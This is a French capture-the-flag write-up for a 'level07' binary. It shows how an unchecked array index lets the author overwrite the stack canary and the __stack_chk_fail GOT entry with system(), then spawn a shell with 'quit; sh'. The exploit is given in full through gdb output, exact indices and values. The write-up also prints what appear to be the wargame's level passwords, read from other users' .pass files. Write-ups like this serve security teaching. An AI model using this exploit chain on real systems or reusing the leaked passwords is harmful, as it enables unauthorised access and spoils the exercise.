Dans ce programme, on peut lire et ecrire dans un tableau d'int via les commande suivantes:
	store - store a number into the data storage    
	read  - read a number from the data storage     
	quit  - exit the program

Tous les index multiples de 3 sont reservés par wil, on ne peut pas y utiliser la commande store:
	*** ERROR! ***
	This index is reserved for wil!
	*** ERROR! ***

Comme il ne verifie pas l'index qu'on lui envoie, on peut ecrire potentiellement partout dans la memoire du programme.
On va donc exploiter ça pour override l'adresse le canary du main et le got de __stack_chk_fail:

On a la GOT:
	$ gdb level07
		0x8049ff4 <_GLOBAL_OFFSET_TABLE_>:      0x08049f28
		0x8049ff8 <_GLOBAL_OFFSET_TABLE_+4>:    0xf7ffd918
		0x8049ffc <_GLOBAL_OFFSET_TABLE_+8>:    0xf7ff0a40
		0x804a000 <printf@got.plt>:             0x08048476
		0x804a004 <fflush@got.plt>:             0x08048486
		0x804a008 <getchar@got.plt>:            0x08048496
		0x804a00c <fgets@got.plt>:              0x080484a6
		0x804a010 <__stack_chk_fail@got.plt>:   0x080484b6
		0x804a014 <puts@got.plt>:               0x080484c6
		0x804a018 <__gmon_start__@got.plt>:     0x080484d6
		0x804a01c <__libc_start_main@got.plt>:  0xf7e45420
		0x804a020 <memset@got.plt>:             0x080484f6
		0x804a024 <__isoc99_scanf@got.plt>:     0x08048506
		0x804a028 <data_start>:                 0x00000000

On obtient l'adresse du tableau d'int avec gdb:
	(gdb) disas store_number
		[...]
		0x080486ce <+158>:   mov    %edx,(%eax)		; eax = 0xffffd558 (peut varier selon l'env)
	(gdb) b*0x080486ce
	(gdb) run
		Input command: store
		 Number: 1
		 Index: 1

		Breakpoint 1, 0x080486ce in store_number ()
	(gdb) i r
		eax            0xffffd558       -10920

On calcul l'offset avec le got (varie selon l'env):
0x804a010 - 0xffffd558 = -4160435528, on le divise par 4 pour que l'index du tableau corresponde.
-4160435528 / 4 = -1040108882

On utilise read pour trouver le canary et la return address, on override le canary:
	$ ./level07
		Input command: read
		 Index: 106
		 Number at data[106] is 2023484672				; canary
		 Completed read command successfully
		Input command: read 109
		 Index: 109
		 Number at data[109] is 134515209				; return address
		 Completed read 109 command successfully
		Input command: store
		 Number: 9999			; un nombre random
		 Index: 106
		 Completed store command successfully

On utilise read pour trouver le got de __stack_chk_fail, on cherche 0x080484b6. On le remplace par system (0xf7e6aec8 = 4159090376):
		0x804a010 <__stack_chk_fail@got.plt>:   0x080484b6      ; = 134513846
	Input command: read
	 Index: -1040108889
	 Number at data[3254858407] is 134513846
	 Completed read command successfully
	Input command: store
	 Number: 4159090376
	 Index: -1040108889
	 Completed store command successfully

Maintenant que le got et le canary sont remplacés, on peut quit le programme et lui faire appeler __stack_chk_fail qui est en fait system.
La stack contient notre commande precedente, dont on y ajoute un "; sh".

	Input command: quit; sh
	sh: 1: quit: not found
	$ /tmp/get
		cat: /home/users/level01/.pass: Permission denied
		PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv
		cat: /home/users/level03/.pass: Permission denied
		cat: /home/users/level04/.pass: Permission denied
		3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN
		h4GtNnaMs2kZFN92ymTr2DcJHAzMfzLW25Ep59mq
		cat: /home/users/level07/.pass: Permission denied
		7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
		cat: /home/users/level09/.pass: Permission denied
		cat: /home/users/end/.pass: Permission denied

------------------------------------------------------------------------------------------
table GOT en int: (il peut y avoir des decalages)
-1040108897    Input command:  Index:  Number at data[3254858399] is 0
-1040108896    Input command:  Index:  Number at data[3254858400] is 134520616  // 0x08049f28
-1040108895    Input command:  Index:  Number at data[3254858401] is 4160739608 // 0xf7ffd918
-1040108894    Input command:  Index:  Number at data[3254858402] is 4160686656 // 0xf7ff0a40
-1040108893    Input command:  Index:  Number at data[3254858403] is 4159145088 // 0xf7e78480
-1040108892    Input command:  Index:  Number at data[3254858404] is 4159244416 // 0xf7e90880
-1040108891    Input command:  Index:  Number at data[3254858405] is 4159260736 // 0xf7e94840
-1040108890    Input command:  Index:  Number at data[3254858406] is 4159245216 // 0xf7e90ba0
-1040108889    Input command:  Index:  Number at data[3254858407] is 134513846  // 0x080484b6
-1040108888    Input command:  Index:  Number at data[3254858408] is 4159252416 // 0xf7e927c0
-1040108887    Input command:  Index:  Number at data[3254858409] is 134513878  // 0x080484d6
-1040108886    Input command:  Index:  Number at data[3254858410] is 4158936096 // 0xf7e45420
-1040108885    Input command:  Index:  Number at data[3254858411] is 4160092112 // 0xf7f5f7d0
-1040108884    Input command:  Index:  Number at data[3254858412] is 4159182544 // 0xf7e816d0
